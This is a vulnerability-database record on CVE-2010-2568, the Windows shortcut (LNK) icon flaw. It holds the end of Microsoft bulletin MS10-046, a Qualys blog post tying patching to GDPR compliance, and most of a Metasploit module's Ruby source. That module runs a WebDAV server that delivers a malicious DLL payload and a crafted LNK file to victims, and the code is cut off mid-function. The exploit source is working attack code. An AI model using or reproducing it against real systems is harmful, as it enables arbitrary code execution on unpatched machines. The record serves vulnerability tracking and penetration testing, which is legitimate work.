In addition, shortcuts can also appear as PIF files when they are related to MS-DOS programs.\r\n\r\nWill this security update disable the workaround or Microsoft Fix it solution, if I have previously implemented it? \r\nNo, the workaround and Microsoft Fix it solution operate independently from the security update. After the security update has been implemented, users who have applied the workaround need to undo it.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could present a removable drive to the user with a malicious shortcut file, and an associated malicious binary. When the user opens this drive in Windows Explorer, or any other application that parses the icon of the shortcut, the malicious binary will execute code of the attacker\u2019s choice on the target system.\r\n\r\nAn attacker could also set up a malicious Web site or a remote network share and place the malicious components on this remote location. When the user browses the Web site using a Web browser such as Internet Explorer or a file manager such as Windows Explorer, Windows attempts to load the icon of the shortcut file, invoking the malicious binary. In addition, an attacker could embed an exploit in a document that supports embedded shortcuts or a hosted browser control (such as but not limited to Microsoft Office documents).\r\n\r\nWhat systems are primarily at risk from the vulnerability? 
\r\nDesktop systems used to browse untrusted network shares or untrusted Web sites are most at risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses this vulnerability by correctly validating the icon reference of a shortcut.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-2568.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nAt the time this security bulletin was released, this vulnerability was being exploited by a number of malware families.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022 Sergey I. Ulasen and Uleg Kopreev of VirusBlokAda for reporting the Shortcut Icon Loading Vulnerability (CVE-2010-2568)\r\n\u2022 Andreas Marx and Maik Morgenstern of AV-Test for reporting the Shortcut Icon Loading Vulnerability (CVE-2010-2568)\r\n\u2022 Will Dormann of CERT/CC for working with us on the Shortcut Icon Loading Vulnerability (CVE-2010-2568)\r\n\u2022 Niels Teusink for working with us on the Shortcut Icon Loading Vulnerability (CVE-2010-2568)\r\n\u2022 Stefan Kanthak for working with us on the Shortcut Icon Loading Vulnerability (CVE-2010-2568)\r\n\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. 
Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022 Customers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022 International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (August 2, 2010): Bulletin published.", "edition": 1, "modified": "2010-08-03T00:00:00", "published": "2010-08-03T00:00:00", "id": "SECURITYVULNS:DOC:24364", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24364", "title": "Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:13", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2568"], "description": "If your organization needs a compelling reason for establishing or enhancing its vulnerability management program, circle this date in bold, red ink on your corporate calendar: May 25, 2018.\n\n\n\nOn that day, the EU's General Data Protection Regulation (GDPR) goes into effect, intensifying the need for organizations to painstakingly protect EU residents\u2019 data from accidental mishandling and foul play.\n\nWhile complying with GDPR involves adopting and modifying a variety of IT systems and business processes, having comprehensive and effective vulnerability management should be key in your efforts.\n\nWhy? Too many preventable data breaches occur because hackers exploit well-known vulnerabilities for which patches are available but haven\u2019t been installed.\n\nThis happens because many organizations, including large ones with sophisticated IT infrastructures and resources, lack [visibility into their IT assets and their vulnerabilities](<https://blog.qualys.com/technology/2017/06/28/countdown-to-gdpr-get-2020-visibility-into-your-it-assets>). 
Flying blind, they fail to [detect and remediate on a timely basis](<https://blog.qualys.com/news/2017/07/11/countdown-to-gdpr-prioritize-vulnerability-remediation>) critical bugs, leaving them like low-hanging fruit for cyber data thieves to feast on.\n\nIn this installment of our [GDPR preparedness series](<https://blog.qualys.com/news/2017/06/21/countdown-to-gdpr-reduce-your-risk>), we\u2019ll dive into the topic of vulnerability management and its importance for staying compliant with this regulation. GDPR carries hefty penalties and fines, including one of \u20ac20 million or 4% of annual revenue, whichever is higher, and applies to companies worldwide that handle EU residents\u2019 personal data.\n\n### GDPR: A Fierce Regulation for EU Customer Data Protection\n\nYou won\u2019t find detailed prescriptions for specific processes and technologies required for compliance in[ the text of GDPR](<http://ec.europa.eu/justice/data-protection/reform/files/regulation_oj_en.pdf>). What the 88-page document makes abundantly clear is that both data \u201ccontrollers\u201d and data \u201cprocessors\u201d must protect EU customer information through _\u201cappropriate technical and organisational measures.\u201d_\n\nThe regulation also stresses the need for organizations to have in place secure IT networks and systems that can \u201cresist, at a given level of confidence, accidental events or unlawful or malicious actions.\u201d\n\n\u201cThis could, for example, include preventing unauthorised access to electronic communications networks and malicious code distribution and stopping \u2018denial of service\u2019 attacks and damage to computer and electronic communication systems,\u201d reads the document.\n\nIn the context of GDPR, this means you must do whatever is in your power to prevent accidental or malicious incidents that compromise the \u201cavailability, authenticity, integrity and confidentiality of stored or transmitted personal data.\u201d\n\nAs a basic, 
foundational InfoSec practice, effective vulnerability management should be a core component of complying with GDPR and its requirements for the protection of EU residents\u2019 personal data.\n\n### Immunize Your IT Environment Against Vulnerability Exploits\n\nEvery vulnerability that has been publicly disclosed represents a potential opportunity for hackers looking to break into your network.\n\nWhen you methodically, strategically and continuously detect, assess and remediate these bugs, whether through patching or mitigation, you eliminate entry points for cyber criminals, systematically and consistently lowering your risk.\n\nWith proper vulnerability management, you \u201cimmunize\u201d your IT assets against opportunistic attacks which are designed to exploit common, well-known bugs and which are the most likely to hit your network.\n\nIn its [2016 Data Breach Investigations Report (DBIR)](<http://www.verizonenterprise.com/resources/reports/rp_DBIR_2016_Report_en_xg.pdf>), Verizon said hackers view as \u201coldies that are still goodies\u201d these long-disclosed CVEs (Common Vulnerabilities and Exposures) which remain unpatched in many organizations. \u201cHackers use what works, and what works doesn\u2019t seem to change all that often,\u201d reads that study.\n\nTo exploit these well-known vulnerabilities, hackers don\u2019t use sophisticated, carefully crafted attacks, but rather aim for volume. 
\u201cThey automate certain weaponized vulnerabilities and spray and pray them across the Internet, sometimes yielding incredible success,\u201d states the Verizon study.\n\nFor example, Kaspersky Lab recently[ reported that exploits to CVE-2010-2568](<https://securelist.com/exploits-how-great-is-the-threat/78125/>) \u2014 the one used in the Stuxnet campaign years ago \u2014 ranked first in 2016 in terms of the number of users attacked, even though a patch for it has been available since 2010.\n\n\u201cThe conclusion is a simple one: even if a malicious user doesn\u2019t have access to expensive zero-days, the chances are high that they\u2019d succeed with exploits to old vulnerabilities because there are many systems and devices out there that have not yet been updated,\u201d Kaspersky stated.\n\nEven if you\u2019re not leaving critical vulnerabilities unpatched for years, you must make sure you\u2019re as quick as possible in your remediation work.\n\nSANS Institute\u2019s second annual survey on continuous monitoring (CM) programs \u2014 titled [\u201cReducing Attack Surface\u201d](<https://www.qualys.com/forms/whitepapers/reducing-attack-surface-sans-second-2016-survey-continuous-monitoring-programs?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=gdpr-q3-2017&utm_content=whitepaper&leadsource=344554475>) and published Nov. 2016 \u2014 found that only 10% of respondents were able to remediate critical vulnerabilities in 24 hours or less, which is the ideal scenario. According to SANS, breach risk reaches moderate levels at the one-week mark and becomes high when a vulnerability remains in a critical system for a month or longer.\n\nA good example of why time is of the essence when dealing with critical vulnerabilities was the WannaCry ransomware rampage that created chaos worldwide in May. 
WannaCry[ spread using EternalBlue](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>), an exploit for a Windows OS vulnerability ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) that Microsoft had patched in March and had rated as \u201cCritical\u201d due to the potential for attackers to execute remote code in affected systems.\n\nSimply put, if most organizations had patched that vulnerability promptly, or at least within a month after its disclosure, WannaCry would have been a non-event. Instead,[ it infected hundreds of thousands of computers](<https://www.wired.com/2017/05/ransomware-meltdown-experts-warned/>) in about 150 countries, severely disrupted the operation of hospitals, utilities, manufacturing plants, telecommunications companies, transportation providers, government agencies and financial institutions, and caused[ an estimated $4 billion in losses](<http://www.cbsnews.com/news/wannacry-ransomware-attacks-wannacry-virus-losses/>).\n\nDespite the global mayhem caused by WannaCry, which major media outlets covered exhaustively, a[ researcher found more than 50,000 machines still vulnerable to EternalBlue](<http://www.darkreading.com/vulnerabilities---threats/50000-machines-remain-vulnerable-to-eternalblue-attacks/d/d-id/1329361>) as recently as mid-July.\n\nThat\u2019s just one example that illustrates why effective vulnerability management is such an important InfoSec practice.\n\n### Vulnerability Management: Cornerstone of InfoSec\n\n\u201cContinuous Vulnerability Assessment and Remediation\u201d stands as the fourth most important practice in the Center for Internet Security\u2019s (CIS)[ 20 Critical Security Controls](<https://www.cisecurity.org/controls/>).\n\nCIS estimates that an organization that implements its first five controls \u2014 which collectively are considered foundational for cyber security \u201chygiene\u201d \u2014 
is able to protect itself against 85 percent of attacks.\n\n\u201cOrganizations that do not scan for vulnerabilities and proactively address discovered flaws face a significant likelihood of having their computer systems compromised,\u201d[ CIS states](<https://www.cisecurity.org/controls/continuous-vulnerability-assessment-and-remediation/>).\n\nThus, an InfoSec team with flawed or non-existent vulnerability management is at a high risk for data breaches, and, consequently, for GDPR non-compliance.\n\nEffective vulnerability management requires continuously identifying threats, monitoring changes in your network, discovering and mapping all your devices and software \u2014 including new, unauthorized and forgotten ones \u2014, and reviewing configuration details for each asset.\n\nYou need global visibility into your systems\u2019 vulnerabilities to stay ahead of attackers, especially today, as digitalization blurs the traditional boundaries of IT perimeters and exposes more and more IT assets on the Internet. \n\n### Qualys Vulnerability Management\n\n[Qualys\u2019 cloud-based Vulnerability Management](<https://www.qualys.com/suite/vulnerability-management/>) (VM) continuously identifies exposures so you can defend your organization against attacks anytime, anywhere.\n\nVM maps all assets on the network, detailing their OS, ports, services and certificates, and scans them for vulnerabilities with Six Sigma 99.99966 percent accuracy. It assigns remediation tickets, manages exceptions, lists patches for each host and integrates with existing IT ticketing systems.\n\nIn addition, VM generates comprehensive reports customized for different recipients \u2014 like IT pros, business executives or auditors \u2014 and incorporates context and insight, including progress against goals. 
Via VM\u2019s APIs, the reporting data can be integrated with other security and compliance systems.\n\nWhen VM is paired with the [Qualys Continuous Monitoring](<https://www.qualys.com/suite/continuous-monitoring/>) (CM) app, you\u2019ll be alerted about potential threats \u2014 such as new hosts/OSes, expiring certificates, unexpected open ports and unauthorized software \u2014 so problems can be tackled before turning into breaches. \n\n\u201cContinuous monitoring is quickly coming to the forefront as a key activity for the ongoing security of networks, systems and, by extension, enterprises,\u201d reads the 2015 SANS Institute continuous monitoring report[ \u201cWhat Are Their Vulnerabilities?\u201d](<http://www.sans.org/reading-room/whitepapers/analyst/vulnerabilities-survey-continuous-monitoring-36377>)\n\nWith Qualys CM, you can keep an eye on your global network from the cloud, like hackers are doing right now, and alert the appropriate people to critical security issues, like unexpected network changes.\n\nIn addition to Qualys scanners, VM also works with the groundbreaking Qualys Cloud Agents, extending its network coverage to assets that can\u2019t be scanned. 
These lightweight, all-purpose, self-updating agents reside on the assets they monitor \u2014 no scan windows, credentials or firewall changes needed \u2014 so vulnerabilities are found faster with minimal network impact.\n\nVM also supports your organization\u2019s digital transformation efforts through its capacity to monitor hybrid IT environments that include not only on-premises hardware and software but also cloud workloads, mobile devices, IoT systems, DevOps continuous app development and deployment pipelines and other disruptive technologies.\n\n### Stay on the Right Side of GDPR with Qualys\n\nNew software vulnerabilities are disclosed daily \u2014 to the tune of thousands per year \u2014 so organizations must know at all times which vulnerabilities are present in their IT assets \u2014 on-premises, in clouds, and on endpoints \u2014; understand the level of risk each one carries; and plan remediation of affected IT assets accordingly.\n\n\u201cVulnerability management has been a Sisyphean endeavor for decades. Attacks come in millions, exploits are automated and every enterprise is subject to the wrath of the quick-to-catch-on hacker. What\u2019s worse, new vulnerabilities come out every day,\u201d reads[ Verizon\u2019s 2016 DBIR](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2016/>).\n\nIf an InfoSec team patches, remediates, and mitigates the right vulnerabilities at the right time, its organization will avoid falling prey to most cyber attacks, and slash its risk of suffering a data breach, whose consequences could include GDPR penalties.\n\nWith Qualys VM, you\u2019ll be able to consistently address critical vulnerabilities in your most important IT assets on a timely basis, putting your organization in a solid position to withstand the daily attacks from hackers seeking to exploit unpatched gaps and compromise your customer data. 
\n\nWith an effective vulnerability management program in place, you\u2019ll be a lot more confident about complying with GDPR when dawn breaks on the morning of May 25, 2018.\n\n### Read Other Posts in the Countdown to GDPR Series:\n\n * [Reduce Your Risk](<https://blog.qualys.com/news/2017/06/21/countdown-to-gdpr-reduce-your-risk>)\n * [Get 20/20 Visibility Into Your IT Assets](<https://blog.qualys.com/technology/2017/06/28/countdown-to-gdpr-get-2020-visibility-into-your-it-assets>)\n * [Prioritize Vulnerability Remediation](<https://blog.qualys.com/news/2017/07/11/countdown-to-gdpr-prioritize-vulnerability-remediation>)\n * [Assess Vendor Risk](<https://blog.qualys.com/news/2017/07/19/countdown-to-gdpr-assess-vendor-risk>)\n * [IT Policy Compliance](<https://blog.qualys.com/news/2017/08/09/countdown-to-gdpr-it-policy-compliance>)\n * [Web Application Security](<https://blog.qualys.com/news/2018/02/05/for-gdpr-compliance-web-app-security-is-a-must>)\n\n* * *\n\n_To learn more about how Qualys solutions can help you become GDPR compliant, visit _[_qualys.com/gdpr _](<https://lps.qualys.com/GDPR_lp.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=gdpr-q3-2017&utm_content=trial&leadsource=344554475>)_where you can download our _**_free guide_**_ and watch our_**_ webcast_**_._\n\n_(Jimmy Graham is a Director of Product Management at Qualys.)_", "modified": "2017-08-02T15:27:04", "published": "2017-08-02T15:27:04", "id": "QUALYSBLOG:515F885592B6DF57D6F93B1D92D2782D", "href": "https://blog.qualys.com/news/2017/08/02/countdown-to-gdpr-manage-vulnerabilities", "type": "qualysblog", "title": "Countdown to GDPR: Manage Vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-08-27T01:31:46", "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. 
This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.\n", "published": "2010-08-04T02:21:20", "type": "metasploit", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2019-05-23T12:01:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS10_046_SHORTCUT_ICON_DLLLOADER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t\t=> 'Microsoft Windows Shell LNK Code Execution',\n 'Description'\t=> %q{\n This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. 
This module creates a WebDAV service that can be used\n to run an arbitrary payload when accessed as a UNC path.\n },\n 'Author'\t\t=>\n [\n 'hdm', # Module itself\n 'jduck', # WebDAV implementation, UNCHOST var\n 'B_H' # Clean LNK template\n ],\n 'License'\t\t=> MSF_LICENSE,\n 'References'\t=>\n [\n ['CVE', '2010-2568'],\n ['OSVDB', '66387'],\n ['MSB', 'MS10-046']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload'\t\t=>\n {\n 'Space'\t=> 2048,\n },\n 'Platform'\t\t=> 'win',\n 'Targets'\t\t=>\n [\n [ 'Automatic',\t{ } ]\n ],\n 'DisclosureDate' => 'Jul 16 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new(\t'SRVPORT',\t\t [ true, \"The daemon port to listen on (do not change)\", 80 ]),\n OptString.new(\t'URIPATH',\t\t [ true, \"The URI to use (do not change).\", \"/\" ]),\n OptString.new( 'UNCHOST', [ false, \"The host portion of the UNC path to provide to clients (ex: 1.2.3.4).\" ])\n ])\n\n deregister_options('SSL', 'SSLVersion') # Just for now\n end\n\n def on_request_uri(cli, request)\n\n case request.method\n when 'OPTIONS'\n process_options(cli, request)\n when 'PROPFIND'\n process_propfind(cli, request)\n when 'GET'\n process_get(cli, request)\n else\n print_error(\"Unexpected request method encountered: #{request.method}\")\n resp = create_response(404, \"Not Found\")\n resp.body = \"\"\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n end\n\n end\n\n def process_get(cli, request)\n\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n webdav = \"\\\\\\\\#{myhost}\\\\\"\n\n if (request.uri =~ /\\.dll$/i)\n print_status \"Sending DLL payload\"\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_dll({ :code => p.encoded })\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n if (request.uri =~ /\\.lnk$/i)\n print_status \"Sending LNK file\"\n\n data = generate_link(\"#{@exploit_unc}#{@exploit_dll}\")\n\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n print_status \"Sending UNC redirect\"\n resp = create_response(200, \"OK\")\n\n resp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=#{@exploit_unc}\"></head><body></body></html>|\n\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n end\n\n #\n # OPTIONS requests sent by the WebDav Mini-Redirector\n #\n def process_options(cli, request)\n print_status(\"Responding to WebDAV OPTIONS request\")\n headers = {\n 'MS-Author-Via' => 'DAV',\n#\t\t\t'DASL' => '<DAV:sql>',\n#\t\t\t'DAV' => '1, 2',\n 'Allow' => 'OPTIONS, GET, PROPFIND',\n 'Public' => 'OPTIONS, GET, PROPFIND'\n }\n resp = create_response(207, \"Multi-Status\")\n resp.body = \"\"\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n end\n\n #\n # PROPFIND requests sent by the WebDav Mini-Redirector\n #\n def process_propfind(cli, request)\n path = request.uri\n print_status(\"Received WebDAV PROPFIND request for #{path}\")\n body = ''\n\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n my_uri = \"http://#{my_host}/\"\n\n if path =~ /\\.dll$/i\n # Response for the DLL\n print_status(\"Sending DLL multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{@exploit_dll}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n return\n end\n\n if path =~ /\\.lnk$/i\n # Response for the DLL\n print_status(\"Sending DLL multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{@exploit_lnk}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength>\n<lp1:getlastmodified>Mon, 19 Jul 2010 
20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>shortcut</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n return\n end\n\n if path !~ /\\/$/\n\n if path.index(\".\")\n print_status(\"Sending 404 for #{path} ...\")\n resp = create_response(404, \"Not Found\")\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n return\n else\n print_status(\"Sending 301 for #{path} ...\")\n resp = create_response(301, \"Moved\")\n resp[\"Location\"] = path + \"/\"\n resp['Content-Type'] = 'text/html'\n cli.send_response(resp)\n return\n end\n end\n\n print_status(\"Sending directory multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\n <D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n <D:href>#{path}</D:href>\n <D:propstat>\n <D:prop>\n <lp1:resourcetype><D:collection/></lp1:resourcetype>\n <lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n <lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n <lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n <D:supportedlock>\n <D:lockentry>\n <D:lockscope><D:exclusive/></D:lockscope>\n <D:locktype><D:write/></D:locktype>\n </D:lockentry>\n <D:lockentry>\n <D:lockscope><D:shared/></D:lockscope>\n <D:locktype><D:write/></D:locktype>\n </D:lockentry>\n 
</D:supportedlock>\n <D:lockdiscovery/>\n <D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n </D:prop>\n <D:status>HTTP/1.1 200 OK</D:status>\n </D:propstat>\n</D:response>\n|\n\n\n subdirectory = %Q|\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{Rex::Text.rand_text_alpha(6)}/</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n\n files = %Q|\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{@exploit_dll}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n\n<D:response xmlns:lp1=\"DAV:\" 
xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}#{@exploit_lnk}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength>\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\n<lp2:executable>T</lp2:executable>\n<D:supportedlock>\n<D:lockentry>\n<D:lockscope><D:exclusive/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n<D:lockentry>\n<D:lockscope><D:shared/></D:lockscope>\n<D:locktype><D:write/></D:locktype>\n</D:lockentry>\n</D:supportedlock>\n<D:lockdiscovery/>\n<D:getcontenttype>shortcut</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n|\n if request[\"Depth\"].to_i > 0\n if path.scan(\"/\").length < 2\n body << subdirectory\n else\n body << files\n end\n end\n\n body << \"</D:multistatus>\"\n\n body.gsub!(/\\t/, '')\n\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\n cli.send_response(resp)\n end\n\n def generate_link(unc)\n uni_unc = unc.unpack(\"C*\").pack(\"v*\")\n path = ''\n path << [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n ].pack(\"C*\")\n path << uni_unc\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n ].pack('C*')\n\n idlist_data = ''\n 
